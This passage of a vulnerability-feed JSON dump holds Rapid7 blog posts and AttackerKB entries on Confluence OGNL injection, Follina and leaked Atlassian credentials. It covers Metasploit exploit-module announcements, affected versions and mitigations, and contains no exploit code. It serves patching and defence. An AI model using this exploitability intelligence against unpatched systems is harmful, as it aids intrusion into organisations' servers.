release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- : \nThis PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-10T18:59:32", "description": "## Confluence Server OGNL Injection\n\n\n\nOur own [wvu](<https://github.com/wvu-r7>) along with [Jang](<https://twitter.com/testanull>) added a module that exploits an OGNL injection ([CVE-2021-26804](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection>))in Atlassian Confluence's WebWork component to execute commands as the Tomcat user. CVE-2021-26804 is a critical remote code execution vulnerability in Confluence Server and Confluence Data Center and is actively being exploited in the wild. Initial discovery of this exploit was by Benny Jacob (SnowyOwl).\n\n## More Enhancements\n\nIn addition to the module, we would like to highlight some of the enhancements that have been added for this release. Contributor [e2002e](<https://github.com/e2002e>) added the `OUTFILE` and `DATABASE` options to the `zoomeye_search` module allowing users to save results to a local file or local database along with improving the output of the module to provide better information about the target. Our own [dwelch-r7](<https://github.com/dwelch-r7>) has added support for fully interactive shells against Linux environments with `shell -it`. In order to use this functionality, users will have to enable the feature flag with `features set fully_interactive_shells true`. Contributor [pingport80](<https://github.com/pingport80>) has added `powershell` support for `write_file` method that is binary safe and has also replaced explicit `cat` calls with file reads from the file library to provide broader support.\n\n## New module content (1)\n\n * [Atlassian Confluence WebWork OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/15645>) by [wvu](<https://github.com/wvu-r7>), [Benny Jacob](<https://twitter.com/bennyyjacob>), and [Jang](<https://twitter.com/testanull>), which exploits [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection?referrer=blog>) \\- This adds an exploit module targeting an OGNL injection vulnerability (CVE-2021-26084) in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n\n## Enhancements and features\n\n * [#15278](<https://github.com/rapid7/metasploit-framework/pull/15278>) from [e2002e](<https://github.com/e2002e>) \\- The `zoomeye_search` module has been enhanced to add the `OUTFILE` and `DATABASE` options, which allow users to save results to a local file or to the local database respectively. Additionally the output saved has been improved to provide better information about the target and additional error handling has been added to better handle potential edge cases.\n * [#15522](<https://github.com/rapid7/metasploit-framework/pull/15522>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds support for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`\n * [#15560](<https://github.com/rapid7/metasploit-framework/pull/15560>) from [pingport80](<https://github.com/pingport80>) \\- This PR add powershell support for write_file method that is binary safe.\n * [#15627](<https://github.com/rapid7/metasploit-framework/pull/15627>) from [pingport80](<https://github.com/pingport80>) \\- This PR removes explicit `cat` calls and replaces them with file reads from the file library so that they have broader support.\n\n## Bugs fixed\n\n * [#15634](<https://github.com/rapid7/metasploit-framework/pull/15634>) from [maikthulhu](<https://github.com/maikthulhu>) \\- This PR fixes an issue in `exploit/multi/misc/erlang_cookie_rce` where a missing bitwise flag caused the exploit to fail in some circumstances.\n * [#15636](<https://github.com/rapid7/metasploit-framework/pull/15636>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression in datastore serialization that caused some event processing to fail.\n * [#15637](<https://github.com/rapid7/metasploit-framework/pull/15637>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue were Metasploit incorrectly marked ipv6 address as having an 'invalid protocol'\n * [#15639](<https://github.com/rapid7/metasploit-framework/pull/15639>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes a bug in the `rename_files` method that would occur when run on a non-Windows shell session.\n * [#15640](<https://github.com/rapid7/metasploit-framework/pull/15640>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates `modules/auxiliary/gather/office365userenum.py` to require python3\n * [#15652](<https://github.com/rapid7/metasploit-framework/pull/15652>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A missing dependency, `py3-pip`, was preventing certain external modules such as `auxiliary/gather/office365userenum` from working due to `requests` requiring `py3-pip` to run properly. This has been fixed by updating the Docker container to install the missing `py3-pip` dependency.\n * [#15654](<https://github.com/rapid7/metasploit-framework/pull/15654>) from [space-r7](<https://github.com/space-r7>) \\- A bug has been fixed in `lib/msf/core/payload/windows/encrypted_reverse_tcp.rb` whereby a call to `recv()` was not being passed the proper arguments to receive the full payload before returning. This could result in cases where only part of the payload was received before continuing, which would have resulted in a crash. This has been fixed by adding a flag to the `recv()` function call to ensure it receives the entire payload before returning.\n * [#15655](<https://github.com/rapid7/metasploit-framework/pull/15655>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This cleans up the MySQL client-side options that are used within the library code.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-02T10%3A13%3A16-05%3A00..2021-09-08T18%3A07%3A57-05%3A00%22>)\n * [Full diff 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/compare/6.1.3...6.1.5>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-10T18:32:40", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-26804"], "modified": "2021-09-10T18:32:40", "id": "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "href": "https://blog.rapid7.com/2021/09/10/metasploit-wrap-up-129/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-29T21:59:42", "description": "\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several the company\u2019s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 &amp; CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x\n\n * 2.7.34\n * 2.7.35\n * Questions for Confluence\n\n * 3.0.x\n * 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 &amp; CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server &amp; Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-08-03T22:59:55", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nCVE-2022-26134 is an unauthenticated and remote OGNL injection that is trivial to exploit. See the Rapid7 analysis for additional details.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-07-13T00:00:00", "id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-17T23:03:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if \u2018Allow people to sign up to create their account\u2019 is enabled. To check whether this is enabled go to COG &gt; User Management &gt; User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 02, 2021 1:27am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**NinjaOperator** at September 01, 2021 5:38pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**GhostlaX** at September 04, 2021 1:44am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\n**Cherylyin** at September 03, 2021 2:03am UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis>). Thank you to [Jang (**@testanull**)](<https://twitter.com/testanull>) for being a great collaborator. :)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-26084 Confluence Server OGNL injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-04T00:00:00", "id": "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "href": "https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-27T04:44:47", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 